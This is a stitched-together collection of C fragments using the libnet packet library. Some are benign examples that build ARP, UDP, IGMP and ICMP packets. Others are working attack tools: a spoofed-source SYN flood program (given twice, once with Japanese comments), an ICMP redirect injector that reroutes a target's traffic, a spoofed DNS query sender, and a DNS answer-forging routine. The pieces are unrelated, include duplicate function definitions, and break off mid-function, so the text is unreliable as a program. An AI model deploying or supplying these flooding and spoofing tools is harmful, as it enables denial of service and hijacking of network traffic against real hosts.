int
send_tcp(struct libnet_link_int *l, u_char *device, u_long src_ip, u_short
src_prt, u_long dst_ip, u_short dst_prt)
{
int n;
u_char *buf;
if (libnet_init_packet(LIBNET_TCP_H + LIBNET_IP_H + LIBNET_ETH_H,
&buf) == -1)
{
perror("no packet memory");
exit(EXIT_FAILURE);
}
/*
* Ethernet header
*/
libnet_build_ethernet(enet_dst, enet_src, ETHERTYPE_IP, NULL, 0, buf);
libnet_build_ip(LIBNET_TCP_H,
0,
242,
0,
64,
IPPROTO_TCP,
src_ip,
dst_ip,
NULL,
0,
buf + LIBNET_ETH_H);
libnet_build_tcp(src_prt,
dst_prt,
111111,
999999,
TH_SYN,
32767,
0,
NULL,
0,
buf + LIBNET_IP_H + LIBNET_ETH_H);
libnet_do_checksum(buf + LIBNET_ETH_H, IPPROTO_IP, LIBNET_IP_H);
libnet_do_checksum(buf + LIBNET_ETH_H, IPPROTO_TCP, LIBNET_TCP_H);
n = libnet_write_link_layer(l, device, buf, LIBNET_ETH_H + LIBNET_IP_H
+ LIBNET_TCP_H);
if (n != LIBNET_ETH_H + LIBNET_IP_H + LIBNET_TCP_H)
{
fprintf(stderr, "Oopz. Only wrote %d bytes\n", n);
}
else
{
printf("Wrote %d byte TCP packet through linktype %d\n", n, l->linktype);
}
libnet_destroy_packet(&buf);
return (n);
}
int init(void) {
/* Ethernet header */
etherhdr.ether_type = ETHERTYPE_IP; /* Ethernet type IP */
memset(etherhdr.ether_shost, 0, 6); /* Ethernet source address */
memset(etherhdr.ether_dhost, 0xff, 6); /* Ethernet destination address */
/* IP header */
memset(&iphdr.ip_src.s_addr, 0, 4); /* IP source address 0.0.0.0
* (pretend to be proxy to
* avoid being elected as master) */
inet_aton(MCAST_ALL_HOSTS, &iphdr.ip_dst); /* IP destination address */
iphdr.ip_tos = 0; /* IP type of services */
iphdr.ip_id = (u_int16_t)libnet_get_prand(PRu16); /* IP ID */
iphdr.ip_p = IPPROTO_IGMP; /* IP protocol IGMP */
iphdr.ip_off = 0; /* IP fragmentation offset */
iphdr.ip_ttl = 1; /* IP TTL - set to 1 purposely */
/* IGMP header */
igmphdr.igmp_type = IGMP_MEMBERSHIP_QUERY; /* IGMP type */
igmphdr.igmp_code = 0; /* IGMP code */
inet_aton(MCAST_MDNS, &igmphdr.igmp_group); /* IGMP group address */
/* Create packet */
linkint = libnet_open_link_interface(LINK_INTERFACE, errbuf);
if (linkint == NULL) {
return -1;
}
igmp_packetlen = LIBNET_ETH_H + LIBNET_IP_H + LIBNET_IGMP_H;
if (libnet_init_packet(igmp_packetlen, &pkt) == -1) {
return -1;
}
libnet_build_ethernet(etherhdr.ether_dhost, etherhdr.ether_shost,
ETHERTYPE_IP, NULL, 0, pkt);
libnet_build_ip(LIBNET_IGMP_H, iphdr.ip_tos, iphdr.ip_id, iphdr.ip_off,
iphdr.ip_ttl, iphdr.ip_p, iphdr.ip_src.s_addr, iphdr.ip_dst.s_addr,
NULL, 0, pkt + LIBNET_ETH_H);
libnet_build_igmp(igmphdr.igmp_type, igmphdr.igmp_code,
igmphdr.igmp_group.s_addr, NULL, 0,
pkt + LIBNET_ETH_H + LIBNET_IP_H);
libnet_do_checksum(pkt + LIBNET_ETH_H, IPPROTO_IP, LIBNET_IP_H);
libnet_do_checksum(pkt + LIBNET_ETH_H, IPPROTO_IGMP, LIBNET_IGMP_H);
}
int
send_arp(struct link_int *l, u_long ip, u_char *device)
{
int n;
u_char *buf;
if (libnet_init_packet(ARP_H + ETH_H, &buf) == -1)
{
perror("libnet_init_packet memory:");
exit(EXIT_FAILURE);
}
/*
* Ethernet header
*/
libnet_build_ethernet(enet_dst, enet_src, ETHERTYPE_ARP, NULL, 0, buf);
/*
* ARP header
*/
libnet_build_arp(ARPHRD_ETHER,
ETHERTYPE_IP,
6,
4,
ARPOP_REQUEST,
enet_src,
(u_char *)&ip,
enet_dst,
(u_char *)&ip,
NULL,
0,
buf + ETH_H);
n = libnet_write_link_layer(l, device, buf, ARP_H + ETH_H);
fprintf(stderr, ".");
libnet_destroy_packet(&buf);
return (n);
}
int
send_arp(struct libnet_link_int *l, u_char *device)
{
int n;
u_char *buf;
if (libnet_init_packet(LIBNET_ARP_H + LIBNET_ETH_H, &buf) == -1)
{
perror("libnet_init_packet memory:");
exit(EXIT_FAILURE);
}
/*
* Ethernet header
*/
libnet_build_ethernet(enet_dst, enet_src, ETHERTYPE_ARP, NULL, 0, buf);
/*
* ARP header
*/
libnet_build_arp(ARPHRD_ETHER,
ETHERTYPE_IP,
6,
4,
ARPOP_REQUEST,
enet_src,
ip_src,
enet_dst,
ip_dst,
NULL,
0,
buf + LIBNET_ETH_H);
n = libnet_write_link_layer(l, device, buf, LIBNET_ARP_H + LIBNET_ETH_H);
printf("Wrote %d byte ARP packet through linktype %d\n", n, l->linktype);
libnet_destroy_packet(&buf);
return (n);
}
int buildudp(ETHERhdr *eth, IPhdr *ip, UDPhdr *udp, FileData *pd,
FileData *ipod, char *device)
{
int n;
u_int32_t udp_packetlen = 0, udp_meta_packetlen = 0;
static u_int8_t *pkt;
static int sockfd = -1;
struct libnet_link_int *l2 = NULL;
u_int8_t link_offset = 0;
#if !defined(WIN32)
int sockbuff = IP_MAXPACKET;
#endif
if (pd->file_mem == NULL)
pd->file_s = 0;
if (ipod->file_mem == NULL)
ipod->file_s = 0;
if (got_link) /* data link layer transport */
{
if ((l2 = libnet_open_link_interface(device, errbuf)) == NULL)
{
nemesis_device_failure(INJECTION_LINK, (const char *)device);
return -1;
}
link_offset = LIBNET_ETH_H;
}
else
{
if ((sockfd = libnet_open_raw_sock(IPPROTO_RAW)) < 0)
{
nemesis_device_failure(INJECTION_RAW, (const char *)NULL);
return -1;
}
#if !defined(WIN32)
if ((setsockopt(sockfd, SOL_SOCKET, SO_SNDBUF, (const void *)&sockbuff,
sizeof(sockbuff))) < 0)
{
fprintf(stderr, "ERROR: setsockopt() failed.\n");
return -1;
}
#endif
}
udp_packetlen = link_offset + LIBNET_IP_H + LIBNET_UDP_H + pd->file_s +
ipod->file_s;
udp_meta_packetlen = udp_packetlen - (link_offset + LIBNET_IP_H);
#ifdef DEBUG
printf("DEBUG: UDP packet length %u.\n", udp_packetlen);
printf("DEBUG: IP options size %u.\n", ipod->file_s);
printf("DEBUG: UDP payload size %u.\n", pd->file_s);
#endif
if (libnet_init_packet(udp_packetlen, &pkt) == -1)
{
fprintf(stderr, "ERROR: Unable to allocate packet memory.\n");
return -1;
}
if (got_link)
libnet_build_ethernet(eth->ether_dhost, eth->ether_shost, ETHERTYPE_IP,
NULL, 0, pkt);
libnet_build_ip(udp_meta_packetlen, ip->ip_tos, ip->ip_id, ip->ip_off,
ip->ip_ttl, ip->ip_p, ip->ip_src.s_addr, ip->ip_dst.s_addr,
NULL, 0, pkt + link_offset);
libnet_build_udp(udp->uh_sport, udp->uh_dport, pd->file_mem,
pd->file_s, pkt + link_offset + LIBNET_IP_H);
if (got_ipoptions)
{
if ((libnet_insert_ipo((struct ipoption *)ipod->file_mem,
ipod->file_s, pkt + link_offset)) == -1)
{
fprintf(stderr, "ERROR: Unable to add IP options, discarding "
"them.\n");
}
}
if (got_link)
libnet_do_checksum(pkt + LIBNET_ETH_H, IPPROTO_IP, LIBNET_IP_H +
ipod->file_s);
libnet_do_checksum(pkt + link_offset, IPPROTO_UDP, LIBNET_UDP_H +
pd->file_s + ipod->file_s);
if (got_link)
n = libnet_write_link_layer(l2, device, pkt, udp_packetlen);
else
n = libnet_write_ip(sockfd, pkt, udp_packetlen);
if (verbose == 2)
nemesis_hexdump(pkt, udp_packetlen, HEX_ASCII_DECODE);
if (verbose == 3)
nemesis_hexdump(pkt, udp_packetlen, HEX_RAW_DECODE);
if (n != udp_packetlen)
{
fprintf(stderr, "ERROR: Incomplete packet injection. Only wrote "
"%d bytes.\n", n);
}
else
{
if (verbose)
{
if (got_link)
printf("Wrote %d byte UDP packet through linktype %s.\n", n,
nemesis_lookup_linktype(l2->linktype));
else
printf("Wrote %d byte UDP packet.\n", n);
}
}
libnet_destroy_packet(&pkt);
if (got_link)
libnet_close_link_interface(l2);
else
libnet_close_raw_sock(sockfd);
return n;
}
int
send_arp(struct libnet_link_int *l, u_int32_t ip, u_char *device, u_char *macaddr, u_char *broadcast, u_char *netmask, u_short arptype)
{
int n;
u_char *buf;
u_char *target_mac;
u_char device_mac[6];
u_char bcast_mac[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff};
u_char zero_mac[6] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
if (libnet_init_packet(LIBNET_ARP_H + LIBNET_ETH_H, &buf) == -1) {
cl_log(LOG_ERR, "libnet_init_packet memory:");
return -1;
}
/* Convert ASCII Mac Address to 6 Hex Digits. */
/* Ethernet header */
if (get_hw_addr((char*)device, device_mac) < 0) {
cl_log(LOG_ERR, "Cannot find mac address for %s",
device);
return -1;
}
if (libnet_build_ethernet(bcast_mac, device_mac, ETHERTYPE_ARP, NULL, 0
, buf) == -1) {
cl_log(LOG_ERR, "libnet_build_ethernet failed:");
libnet_destroy_packet(&buf);
return -1;
}
if (arptype == ARPOP_REQUEST) {
target_mac = zero_mac;
}
else if (arptype == ARPOP_REPLY) {
target_mac = macaddr;
}
else {
cl_log(LOG_ERR, "unkonwn arptype:");
return -1;
}
/*
* ARP header
*/
if (libnet_build_arp(ARPHRD_ETHER, /* Hardware address type */
ETHERTYPE_IP, /* Protocol address type */
6, /* Hardware address length */
4, /* Protocol address length */
arptype, /* ARP operation */
macaddr, /* Source hardware addr */
(u_char *)&ip, /* Target hardware addr */
target_mac, /* Destination hw addr */
(u_char *)&ip, /* Target protocol address */
NULL, /* Payload */
0, /* Payload length */
buf + LIBNET_ETH_H) == -1) {
cl_log(LOG_ERR, "libnet_build_arp failed:");
libnet_destroy_packet(&buf);
return -1;
}
n = libnet_write_link_layer(l, (char*)device, buf, LIBNET_ARP_H + LIBNET_ETH_H);
if (n == -1) {
cl_log(LOG_ERR, "libnet_build_ethernet failed:");
}
libnet_destroy_packet(&buf);
return (n);
}
int
main(int argc, char *argv[])
{
int packet_size, /* size of our packet */
payload_size, /* size of our packet */
c; /* misc */
u_long src_ip, dst_ip; /* source ip, dest ip */
u_short bport, eport; /* beginning and end ports */
u_short cport; /* current port */
u_char payload[MAX_PAYLOAD_SIZE]; /* packet payload */
u_char *packet; /* pointer to our packet buffer */
char err_buf[LIBNET_ERRBUF_SIZE]; /* error buffer */
u_char *device; /* pointer to the device to use */
struct libnet_link_int *network; /* pointer to link interface struct */
struct libnet_plist_chain plist; /* plist chain */
struct libnet_plist_chain *plist_p; /* plist chain pointer */
printf("libnet example code:\tmodule 4\n\n");
printf("packet injection interface:\tlink layer\n");
printf("packet type:\t\t\tUDP [with payload] using port list chaining\n");
plist_p = NULL;
device = NULL;
src_ip = 0;
dst_ip = 0;
while ((c = getopt(argc, argv, "i:d:s:p:")) != EOF)
{
switch (c)
{
case 'd':
if (!(dst_ip = libnet_name_resolve(optarg, LIBNET_RESOLVE)))
{
libnet_error(LIBNET_ERR_FATAL,
"Bad destination IP address: %s\n", optarg);
}
break;
case 'i':
device = optarg;
break;
case 's':
if (!(src_ip = libnet_name_resolve(optarg, LIBNET_RESOLVE)))
{
libnet_error(LIBNET_ERR_FATAL,
"Bad source IP address: %s\n", optarg);
}
break;
case 'p':
plist_p = &plist;
if (libnet_plist_chain_new(&plist_p, optarg) == -1)
{
libnet_error(LIBNET_ERR_FATAL, "Could not build port list\n");
}
break;
default:
usage(argv[0]);
exit(EXIT_FAILURE);
}
}
if (!src_ip || !dst_ip || !plist_p)
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
c = argc - optind;
if (c != 1)
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
memset(payload, 0, sizeof(payload));
strncpy(payload, argv[optind], strlen(argv[optind]));
/*
* Step 1: Network Initialization (interchangable with step 2).
*/
if (device == NULL)
{
struct sockaddr_in sin;
/*
* Try to locate a device.
*/
if (libnet_select_device(&sin, &device, err_buf) == -1)
{
libnet_error(LIBNET_ERR_FATAL, "libnet_select_device failed: %s\n", err_buf);
}
printf("device:\t\t\t\t%s\n", device);
}
if ((network = libnet_open_link_interface(device, err_buf)) == NULL)
{
libnet_error(LIBNET_ERR_FATAL, "libnet_open_link_interface: %s\n", err_buf);
}
/*
* Get the payload from the user. Hrm. This might fail on a Sparc
* if byte alignment is off...
*/
payload_size = strlen(payload);
/*
* We're going to build a UDP packet with a payload using the
* link-layer API, so this time we need memory for a ethernet header
* as well as memory for the ICMP and IP headers and our payload.
*/
packet_size = LIBNET_IP_H + LIBNET_ETH_H + LIBNET_UDP_H + payload_size;
/*
* Step 2: Memory Initialization (interchangable with step 1).
*/
if (libnet_init_packet(packet_size, &packet) == -1)
{
libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed\n");
}
/*
* Step 3: Packet construction (ethernet header).
*/
libnet_build_ethernet(enet_dst,
enet_src,
ETHERTYPE_IP,
NULL,
0,
packet);
/*
* Step 3: Packet construction (IP header).
*/
libnet_build_ip(LIBNET_UDP_H + payload_size,
0, /* IP tos */
242, /* IP ID */
0, /* Frag */
64, /* TTL */
IPPROTO_UDP, /* Transport protocol */
src_ip, /* Source IP */
dst_ip, /* Destination IP */
NULL, /* Pointer to payload (none) */
0,
packet + LIBNET_ETH_H); /* Packet header memory */
while (libnet_plist_chain_next_pair(plist_p, &bport, &eport))
{
while (!(bport > eport) && bport != 0)
{
cport = bport++;
/*
* Step 3: Packet construction (UDP header).
*/
libnet_build_udp(242, /* source port */
cport, /* dest. port */
payload, /* payload */
payload_size, /* payload length */
packet + LIBNET_ETH_H + LIBNET_IP_H);
/*
* Step 4: Packet checksums (ICMP header *AND* IP header).
*/
if (libnet_do_checksum(packet + ETH_H, IPPROTO_UDP, LIBNET_UDP_H + payload_size) == -1)
{
libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n");
}
if (libnet_do_checksum(packet + ETH_H, IPPROTO_IP, LIBNET_IP_H) == -1)
{
libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n");
}
/*
* Step 5: Packet injection.
*/
c = libnet_write_link_layer(network, device, packet, packet_size);
if (c < packet_size)
{
libnet_error(LN_ERR_WARNING, "libnet_write_link_layer only wrote %d bytes\n", c);
}
else
{
printf("construction and injection completed, wrote all %d bytes, port %d\n", c, cport);
}
}
}
/*
* Shut down the interface.
*/
if (libnet_close_link_interface(network) == -1)
{
libnet_error(LN_ERR_WARNING, "libnet_close_link_interface couldn't close the interface");
}
/*
* Free packet memory.
*/
libnet_destroy_packet(&packet);
return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS);
}
int main(int argc, char *argv[]) {
u_long dest_ip;
u_short dest_port;
u_char errbuf[LIBNET_ERRBUF_SIZE], *packet;
int opt, network, byte_count, packet_size = LIBNET_IP_H + LIBNET_TCP_H;
if(argc < 3)
{
printf("Usage:\n%s\t <target host> <target port>\n", argv[0]);
exit(1);
}
dest_ip = libnet_name_resolve(argv[1], LIBNET_RESOLVE); // the host
dest_port = (u_short) atoi(argv[2]); // the port
network = libnet_open_raw_sock(IPPROTO_RAW); // open network interface
if (network == -1)
libnet_error(LIBNET_ERR_FATAL, "can't open network interface. -- this program must run as root.\n");
libnet_init_packet(packet_size, &packet); // allocate memory for packet
if (packet == NULL)
libnet_error(LIBNET_ERR_FATAL, "can't initialize packet memory.\n");
libnet_seed_prand(); // seed the random number generator
printf("SYN Flooding port %d of %s..\n", dest_port, print_ip(&dest_ip));
while(1) // loop forever (until break by CTRL-C)
{
libnet_build_ip(LIBNET_TCP_H, // size of the packet sans IP header
IPTOS_LOWDELAY, // IP tos
libnet_get_prand(LIBNET_PRu16), // IP ID (randomized)
0, // frag stuff
libnet_get_prand(LIBNET_PR8), // TTL (randomized)
IPPROTO_TCP, // transport protocol
libnet_get_prand(LIBNET_PRu32), // source IP (randomized)
dest_ip, // destination IP
NULL, // payload (none)
0, // payload length
packet); // packet header memory
libnet_build_tcp(libnet_get_prand(LIBNET_PRu16), // source TCP port (random)
dest_port, // destination TCP port
libnet_get_prand(LIBNET_PRu32), // sequence number (randomized)
libnet_get_prand(LIBNET_PRu32), // acknowledgement number (randomized)
TH_SYN, // control flags (SYN flag set only)
libnet_get_prand(LIBNET_PRu16), // window size (randomized)
0, // urgent pointer
NULL, // payload (none)
0, // payload length
packet + LIBNET_IP_H); // packet header memory
if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H) == -1)
libnet_error(LIBNET_ERR_FATAL, "can't compute checksum\n");
byte_count = libnet_write_ip(network, packet, packet_size); // inject packet
if (byte_count < packet_size)
libnet_error(LIBNET_ERR_WARNING, "Warning: Incomplete packet written. (%d of %d bytes)", byte_count, packet_size);
usleep(FLOOD_DELAY); // wait for FLOOD_DELAY milliseconds
}
libnet_destroy_packet(&packet); // free packet memory
if (libnet_close_raw_sock(network) == -1) // close the network interface
libnet_error(LIBNET_ERR_WARNING, "can't close network interface.");
return 0;
}
int main (int argc, char **argv) {
u_long src_ip, /* source address */
dst_ip; /* destination address */
u_short src_port, /* source port */
dst_port, /* destination port */
id; /* dns id we are spoofing */
int written_bytes, /* number of bytes written */
packet_size, /* size of our packet */
payload_size, /* size of our payload */
socket; /* socket to write on */
u_char *packet, /* we build this */
*payload; /* we send this */
if (argc < 6) {
printf("\nusage: ask_dns <source_ip> <port> <destination_ip> <port> <dns_id>\n");
exit (EXIT_FAILURE);
}
if ((socket = libnet_open_raw_sock(IPPROTO_RAW)) == -1)
libnet_error(LIBNET_ERR_FATAL, "network initialization failed\n");
src_ip = libnet_name_resolve(argv[1], 0);
dst_ip = libnet_name_resolve(argv[3], 0);
src_port = (u_short) atoi(argv[2]);
dst_port = (u_short) atoi(argv[4]);
id = (u_short) atoi(argv[5]);
payload = "\x03\x77\x77\x77\x07\x72\x65\x64\x68\x69\x76\x65\x03\x63\x6f\x6d\x00\x00\x01\x00\x01";
payload_size = 21;
/*
* packet memory allocation
*/
packet_size = payload_size + LIBNET_IP_H + LIBNET_UDP_H + LIBNET_DNS_H;
libnet_init_packet(packet_size, &packet);
if (packet == NULL)
libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed\n");
/*
* ip header construction
*/
libnet_build_ip(payload_size + LIBNET_UDP_H + LIBNET_DNS_H,
0, /* ip tos */
0, /* ip id */
0, /* fragmentation bits */
64, /* ttl */
IPPROTO_UDP, /* protocol */
src_ip, /* source address */
dst_ip, /* destination address */
NULL, /* payload */
0, /* payload length */
packet); /* packet buffer */
/*
* udp header construction
* during debugging i found that we weren't generating the correct
* length here, that is why a payload length is included (payload + dns_header)
* it really shouldn't be here though
*/
libnet_build_udp(src_port, /* source port */
dst_port, /* destination port */
NULL, /* payload */
33, /* payload length */
packet + LIBNET_IP_H);
/*
* dns header construction
*/
libnet_build_dns(id, /* dns id */
0x0100, /* control flags */
1, /* number of questions */
0, /* number of answer RR's */
0, /* number of authority RR's */
0, /* number of additional RR's */
payload, /* payload */
payload_size, /* payload length */
packet + LIBNET_IP_H + LIBNET_UDP_H);
/*
* calculate checksum
*/
libnet_do_checksum (packet, IPPROTO_UDP, packet_size - LIBNET_IP_H);
/*
* write packet
*/
written_bytes = libnet_write_ip(socket, packet, packet_size);
/*
* make sure the number of written bytes jives with what we expect
*/
if (written_bytes < packet_size)
libnet_error(LN_ERR_WARNING, "libnet_write_ip only wrote %d of %d bytes\n", written_bytes, packet_size);
/*
* we're done with this packet
*/
libnet_destroy_packet(&packet);
/*
* we're done writing
*/
if (libnet_close_raw_sock(socket) == -1)
libnet_error(LN_ERR_WARNING, "libnet_close_raw_sock couldn't close the interface");
return (written_bytes == -1 ? EXIT_FAILURE : EXIT_SUCCESS);
}
int
main(int argc, char **argv)
{
int sockfd, c;
u_char *buf;
u_long src, dst, gateway;
if (argc < 4)
{
fprintf(stderr,
"usage: %s <old_router> <target> <new_gateway>\n",
argv[0]);
exit(EXIT_FAILURE);
}
if (!(src = libnet_name_resolve(argv[1], 1)))
{
perror("Error resolving source host");
exit(EXIT_FAILURE);
}
if (!(dst = libnet_name_resolve(argv[2], 1)))
{
perror("Error resolving destination host");
exit(EXIT_FAILURE);
}
if (!(gateway = libnet_name_resolve(argv[3], 1)))
{
perror("Error resolving gateway host");
exit(EXIT_FAILURE);
}
if (libnet_init_packet(IP_MAXPACKET, &buf) == -1)
{
perror("Couldn't allocate memory for header");
exit(EXIT_FAILURE);
}
if ((sockfd = libnet_open_raw_sock(IPPROTO_RAW)) == -1)
{
perror("Couldn't open raw socket");
exit(EXIT_FAILURE);
}
libnet_build_ip(LIBNET_ICMP_REDIRECT_H + LIBNET_IP_H,
IPTOS_LOWDELAY | IPTOS_THROUGHPUT,
242,
0,
48,
IPPROTO_ICMP,
src,
dst,
NULL,
0,
buf);
libnet_build_icmp_redirect(
ICMP_REDIRECT,
ICMP_UNREACH_HOST,
gateway,
0, /* just an ip header */
IPTOS_LOWDELAY | IPTOS_THROUGHPUT, /* IP tos */
424, /* IP ID */
0, /* Frag stuff */
64, /* TTL */
IPPROTO_ICMP, /* Transport protocol */
dst, /* Source IP */
src, /* Destination IP */
NULL, /* pointer to payload */
0, /* size of payload */
buf + LIBNET_IP_H); /* packet header memory */
libnet_do_checksum(buf, IPPROTO_ICMP, LIBNET_ICMP_REDIRECT_H +
LIBNET_IP_H);
c = libnet_write_ip(sockfd, buf, LIBNET_ICMP_REDIRECT_H + 2 *
LIBNET_IP_H);
if (c != LIBNET_ICMP_REDIRECT_H + 2 * LIBNET_IP_H)
{
fprintf(stderr, "Error writing to socket, only wrote %d bytes\n", c);
exit(EXIT_FAILURE);
}
printf("Completed, wrote %d bytes\n", c);
libnet_destroy_packet(&buf);
exit(EXIT_SUCCESS);
}
int main(int argc, char *argv[]) {
u_long dest_ip;
u_short dest_port;
u_char errbuf[LIBNET_ERRBUF_SIZE], *packet;
int opt, network, byte_count, packet_size = LIBNET_IP_H + LIBNET_TCP_H;
if(argc < 3)
{
printf("使用方法:\n%s\t <対象ホスト> <対象ポート>\n", argv[0]);
exit(1);
}
dest_ip = libnet_name_resolve(argv[1], LIBNET_RESOLVE); // ホスト
dest_port = (u_short) atoi(argv[2]); // ポート番号
network = libnet_open_raw_sock(IPPROTO_RAW); // ネットワークインタフェースをオープンする
if (network == -1)
libnet_error(LIBNET_ERR_FATAL, "can't open network interface. -- this program must run as root.\n");
libnet_init_packet(packet_size, &packet); // パケット用のメモリを割り当てる
if (packet == NULL)
libnet_error(LIBNET_ERR_FATAL, "can't initialize packet memory.\n");
libnet_seed_prand(); // 乱数生成器に種を与える
printf("SYN Flooding port %d of %s..\n", dest_port, print_ip(&dest_ip));
while(1) // 永久ループ(CTRL-Cで終了されるまで)
{
libnet_build_ip(LIBNET_TCP_H, // IPヘッダを除いたパケットのサイズ
IPTOS_LOWDELAY, // IP tos
libnet_get_prand(LIBNET_PRu16), // IP ID(乱数化)
0, // 断片化
libnet_get_prand(LIBNET_PR8), // TTL (乱数化)
IPPROTO_TCP, // トランスポートプロトコル
libnet_get_prand(LIBNET_PRu32), // 送信元IP (乱数化)
dest_ip, // 宛先IP
NULL, // ペイロード(なし)
0, // ペイロード長
packet); // パケットヘッダメモリ
libnet_build_tcp(libnet_get_prand(LIBNET_PRu16), // 送信元TCPポート (乱数化)
dest_port, // 宛先TCPポート
libnet_get_prand(LIBNET_PRu32), // シーケンス番号 (乱数化)
libnet_get_prand(LIBNET_PRu32), // ACK番号 (乱数化)
TH_SYN, // コントロールフラグ (SYNフラグのみ設定)
libnet_get_prand(LIBNET_PRu16), // ウィンドウサイズ (乱数化)
0, // 至急ポインタ
NULL, // ペイロード (なし)
0, // ペイロード長
packet + LIBNET_IP_H); // パケットヘッダメモリ
if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H) == -1)
libnet_error(LIBNET_ERR_FATAL, "can't compute checksum\n");
byte_count = libnet_write_ip(network, packet, packet_size); // パケットを注入する
if (byte_count < packet_size)
libnet_error(LIBNET_ERR_WARNING, "Warning: Incomplete packet written. (%d of %d bytes)", byte_count, packet_size);
usleep(FLOOD_DELAY); // FLOOD_DELAYミリ秒待機する
}
libnet_destroy_packet(&packet); // パケットメモリを解放する
if (libnet_close_raw_sock(network) == -1) // ネットワークインタフェースをクローズする
libnet_error(LIBNET_ERR_WARNING, "can't close network interface.");
return 0;
}
int
send_icmp(struct libnet_link_int *l, u_char *device, u_long src_ip, u_long
dst_ip)
{
int n;
u_char *buf;
if (libnet_init_packet(LIBNET_ICMP_MASK_H + LIBNET_IP_H + LIBNET_ETH_H,
&buf) == -1)
{
perror("no packet memory");
exit(EXIT_FAILURE);
}
/*
* Ethernet header
*/
libnet_build_ethernet(enet_dst, enet_src, ETHERTYPE_IP, NULL, 0, buf);
libnet_build_ip(LIBNET_ICMP_MASK_H,
0, /* IP tos */
242, /* IP ID */
0, /* Frag */
64, /* TTL */
IPPROTO_ICMP, /* Transport protocol */
src_ip, /* Source IP */
dst_ip, /* Destination IP */
NULL, /* Pointer to payload (none) */
0,
buf + LIBNET_ETH_H); /* Packet header memory */
libnet_build_icmp_mask(ICMP_MASKREPLY, /* type */
0, /* code */
242, /* id */
0, /* seq */
0xffffffff, /* mask */
NULL, /* payload */
0, /* payload_s */
buf + LIBNET_ETH_H + LIBNET_IP_H);
libnet_do_checksum(buf + LIBNET_ETH_H, IPPROTO_IP, LIBNET_IP_H);
libnet_do_checksum(buf + LIBNET_ETH_H, IPPROTO_ICMP, LIBNET_ICMP_MASK_H);
printf("Packet as it will appear on the wire (give or take some byte ordering):");
libnet_hex_dump(buf, LIBNET_ETH_H + LIBNET_IP_H + LIBNET_ICMP_MASK_H, 0,
stdout);
printf("\n");
n = libnet_write_link_layer(l, device, buf, LIBNET_ETH_H + LIBNET_IP_H
+ LIBNET_ICMP_MASK_H);
if (n != LIBNET_ETH_H + LIBNET_IP_H + LIBNET_ICMP_MASK_H)
{
fprintf(stderr, "Oopz. Only wrote %d bytes\n", n);
}
else
{
printf("Wrote %d byte ICMP packet through linktype %d\n", n, l->linktype);
}
libnet_destroy_packet(&buf);
return (n);
}
/******************************************************************************
* spoof_dns *
* *
* check some conditions, build the actual packet, and write the answer *
* arg1: (int) socket to write on *
* ret: none *
******************************************************************************/
void spoof_dns (int socket) {
struct in_addr src, dst; /* used for printing addresses */
int written_bytes, /* number of bytes written */
packet_size, /* size of our packet */
i; /* misc */
u_char *packet; /* we build this */
/*
* check the following conditions before spoofing
* if any of these conditions are violated then no spoofing is done
* - we only want to spoof packets from a nameserver
* - we only want to spoof packets from questions of type A
* - we only want to spoof packets if we have an answer
*/
if (ntohs(chewycenter.dst_port) != 53) {
if (!sflag) {
printf("\nignoring packet: destination not a nameserver");
printf("\n--");
}
return;
}
if (!chewycenter.is_a) {
if (!sflag) {
printf("\nignoring packet: question is not of type A");
printf("\n--");
}
return;
}
if (!chewycenter.have_answer) {
if (!sflag) {
printf("\nignoring packet: no answer for this question");
printf("\n--");
}
return;
}
/*
* if we're here it means we're ready to spoof an answer, lets reflect that
* in the spoofed answers count
*/
num_spoofed_answers++;
/*
* packet memory allocation
*/
packet_size = chewycenter.payload_size + LIBNET_IP_H + LIBNET_UDP_H + LIBNET_DNS_H;
libnet_init_packet(packet_size, &packet);
if (packet == NULL) {
libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed\n");
return;
}
/*
* ip header construction
* source and destination are swapped here because we are spoofing a reply
*/
libnet_build_ip(LIBNET_UDP_H + LIBNET_DNS_H,
0, /* ip tos */
0, /* ip id */
0, /* fragmentation bits */
64, /* ttl */
IPPROTO_UDP, /* protocol */
chewycenter.dst_address, /* source address */
chewycenter.src_address, /* destination address */
NULL, /* payload */
0, /* payload length */
packet); /* packet buffer */
/*
* udp header construction
* source and destination ports are swapped here too
*
* during debugging i found that we weren't generating the correct
* length here, that is why a payload length is included (payload + dns_header)
* although, from what i know, it really shouldn't be here
*/
libnet_build_udp(53, /* source port */
ntohs(chewycenter.src_port), /* destination port */
NULL, /* payload */
chewycenter.payload_size + 12, /* payload length */
packet + LIBNET_IP_H);
/*
* dns header construction
*/
libnet_build_dns(ntohs(chewycenter.dns_id), /* dns id */
0x8580, /* control flags (QR,AA,RD,RA) */
1, /* number of questions */
1, /* number of answer RR's */
0, /* number of authority RR's */
0, /* number of additional RR's */
chewycenter.payload, /* payload */
chewycenter.payload_size, /* payload length */
packet + LIBNET_IP_H + LIBNET_UDP_H);
/*
* calculate checksum
*/
libnet_do_checksum (packet, IPPROTO_UDP, packet_size - LIBNET_IP_H);
/*
* write packet
*/
written_bytes = libnet_write_ip(socket, packet, packet_size);
/*
* make sure the number of written bytes jives with what we expect
*/
if (written_bytes < packet_size) {
printf("\nwarning: ");
libnet_error(LN_ERR_WARNING, "libnet only wrote %d of %d bytes", written_bytes, packet_size);
printf("\n--");
}
/*
* we're done with this packet
*/
libnet_destroy_packet(&packet);
/*
* announce what we've just done
* remember that we've swapped the addresses/ports
*/
src.s_addr = chewycenter.src_address;
dst.s_addr = chewycenter.dst_address;
printf("\nspoofing answer: %s:%d > ", inet_ntoa(dst), ntohs(chewycenter.dst_port));
printf("%s:%d", inet_ntoa(src), ntohs(chewycenter.src_port));
printf("\t[%s = %s]", chewycenter.current_question, chewycenter.current_answer);
#if defined DEBUG
printf("\nDEBUG>\n payload: [%d]", chewycenter.payload_size);
for (i = 0; i < 52; i++)
printf("%x ", chewycenter.payload[i]);
printf("\n");
#endif
printf("\n--");
if (oflag) {
}
}
int main(int argc, char *argv[])
{
// packet type (arp/udp/tcp)
char type[5];
// network device
char *device = "eth0\0";
struct libnet_link_int *link;
// Raw socket
